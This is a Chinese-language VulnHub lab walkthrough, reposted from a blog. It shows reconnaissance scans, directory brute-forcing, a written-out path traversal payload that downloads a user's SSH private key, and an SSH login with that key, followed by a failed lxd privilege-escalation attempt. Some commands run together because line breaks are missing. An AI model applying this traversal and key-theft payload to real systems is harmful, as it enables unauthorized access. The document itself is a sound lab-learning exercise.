本文共 1032 字，大约阅读时间需要 3 分钟。

声明

好好学习，天天向上

搭建

官方建议virtual打开，我这里都调成桥接

渗透

存活扫描，发现目标

arp-scan -l

端口扫描

nmap -T4 -A 192.168.31.121 -p 1-65535 -oN nmap.A

开启端口

发现开启80，6688

访问80

http://192.168.31.121

目录扫描

gobuster dir -u http://192.168.31.121 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x .php,.txt,.html,.zip

访问一下这个/lavalamp

http://192.168.31.121/lavalamp

在最下面发现contact us可以用，提交数据看看

发现其像另一个php提交这些表单内容

访问，在向我们挑衅， 让我们绕过他

http://192.168.31.121/lavalamp/canyoubypassme.php

查看页面源代码发现一个table被设置成透明隐藏了

把这个值调成1.0，输入一个数字，然后下载这个数字，任意文件下载？猜测就是文件包含吧

抓包康康吧，访问passwd失败

但是在最前面随便加上一个内容就成功了

想办法搞定ford这个用户

在/home/ford/.ssh/找到了公钥、私钥，并将私钥保存到本地

file=/vulnhub/../../../../../../../home/ford/.ssh/id_rsa&read=Download+the+number

复制私钥到kali

调整权限并ssh登录

chmod 0600 ./id_rsassh -p 6688 ford@192.168.31.121 -i id_rsa

拿到flag

使用id命令显示用户的UID以及所属组的GID，可以看到当前用户ford所属组中还有一个特殊的lxd组，这个是提权的关键点

当然也有sh脚本可以扫描

在kali上生成镜像

git clone  https://github.com/saghul/lxd-alpine-builder.gitcd lxd-alpine-builder./build-alpine

完成上面操作之后会在当前目录下生成一个tar.gz镜像文件

然并卵，以失败告终，各种报错导致没办法生成tar.gz，后面再研究研究把，耻辱了

转载地址：https://blog.csdn.net/zy15667076526/article/details/112778397 如侵犯您的版权，请留言回复原文章的地址，我们会给您删除此文章，给您带来不便请您谅解！